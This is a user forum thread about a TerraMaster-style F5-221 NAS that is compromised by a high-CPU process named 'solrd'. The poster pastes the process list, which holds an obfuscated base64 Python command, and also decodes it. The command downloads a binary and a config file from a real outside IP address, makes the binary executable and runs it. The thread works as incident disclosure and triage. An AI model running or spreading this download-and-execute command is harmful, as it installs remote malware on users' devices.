Hello all,
I saw that this process "solrd" is taking all the CPU Resorces from my F5-221 NAS. I post it here so every one can see it.
root 13144 4252 0 Aug06 ? 00:00:00 sh -c cd '/usr/www/module' ; /etc/init.d/nas/makemd -s0 -l;python -c "exec(__import__('base64').b64decode('Zj1vcGVuKCIuL3NvbHJkIiwid2IiKQpmLndyaXRlKF9faW1wb3J0X18oInVybGxpYjIiKS51cmxvcGVuKCJodHRwOi8vNDUuMTQ0LjMuMjE2OjEwMDAwL3N0YXJyYWlsL2NidDJ6aXAvc2V0dXAuZXhlIikucmVhZCgpKQpmLmNsb3NlKCkKZj1vcGVuKCIuL2NvbmZpZy5qc29uIiwid2IiKQpmLndyaXRlKF9faW1wb3J0X18oInVybGxpYjIiKS51cmxvcGVuKCJodHRwOi8vNDUuMTQ0LjMuMjE2OjEwMDAwL1ROQVMuanNvbiIpLnJlYWQoKSkKZi5jbG9zZSgpCg=='))" && chmod 777 solrd && ./solrd; -b -tbtrfs 1646732740 &
root 13229 13144 99 Aug06 ? 147-14:52:16 ./solrd
The decode is this python script
"""
f=open("./solrd","wb")
f.write(__import__("urllib2").urlopen("http://45.144.3.216:10000/starrail/cbt2zip/setup.exe").read())
f.close()
f=open("./config.json","wb")
f.write(__import__("urllib2").urlopen("http://45.144.3.216:10000/TNAS.json").read())
f.close()
"""
So I guess someone got access to my NAS, using the TOS Web access and modify that configuration.
This is a seriuos security issue
SOLRD Process using 100% CPE - F5-221 - TOS 4.2.13
Re: SOLRD Process using 100% CPE - F5-221 - TOS 4.2.13
root 4252 4249 0 2021 ? 00:02:42 php-fpm: pool TOS
root 13144 4252 0 Aug06 ? 00:00:00 sh -c cd '/usr/www/module' ; /etc/init.d/nas/makemd -s0 -l;python -c "exec(__import__('base64').b64decode('Zj1vcGVuKCIuL3NvbHJkIiwid2IiKQpmLndyaXRlKF9faW1wb3J0X18oInVybGxpYjIiKS51cmxvcGVuKCJodHRwOi8vNDUuMTQ0LjMuMjE2OjEwMDAwL3N0YXJyYWlsL2NidDJ6aXAvc2V0dXAuZXhlIikucmVhZCgpKQpmLmNsb3NlKCkKZj1vcGVuKCIuL2NvbmZpZy5qc29uIiwid2IiKQpmLndyaXRlKF9faW1wb3J0X18oInVybGxpYjIiKS51cmxvcGVuKCJodHRwOi8vNDUuMTQ0LjMuMjE2OjEwMDAwL1ROQVMuanNvbiIpLnJlYWQoKSkKZi5jbG9zZSgpCg=='))" && chmod 777 solrd && ./solrd; -b -tbtrfs 1646732740 &
root 13144 4252 0 Aug06 ? 00:00:00 sh -c cd '/usr/www/module' ; /etc/init.d/nas/makemd -s0 -l;python -c "exec(__import__('base64').b64decode('Zj1vcGVuKCIuL3NvbHJkIiwid2IiKQpmLndyaXRlKF9faW1wb3J0X18oInVybGxpYjIiKS51cmxvcGVuKCJodHRwOi8vNDUuMTQ0LjMuMjE2OjEwMDAwL3N0YXJyYWlsL2NidDJ6aXAvc2V0dXAuZXhlIikucmVhZCgpKQpmLmNsb3NlKCkKZj1vcGVuKCIuL2NvbmZpZy5qc29uIiwid2IiKQpmLndyaXRlKF9faW1wb3J0X18oInVybGxpYjIiKS51cmxvcGVuKCJodHRwOi8vNDUuMTQ0LjMuMjE2OjEwMDAwL1ROQVMuanNvbiIpLnJlYWQoKSkKZi5jbG9zZSgpCg=='))" && chmod 777 solrd && ./solrd; -b -tbtrfs 1646732740 &
Re: SOLRD Process using 100% CPE - F5-221 - TOS 4.2.13
This seems to be dig virus, please refer to this link: viewtopic.php?f=71&t=2292&p=12383&hilit=pty10#p12383.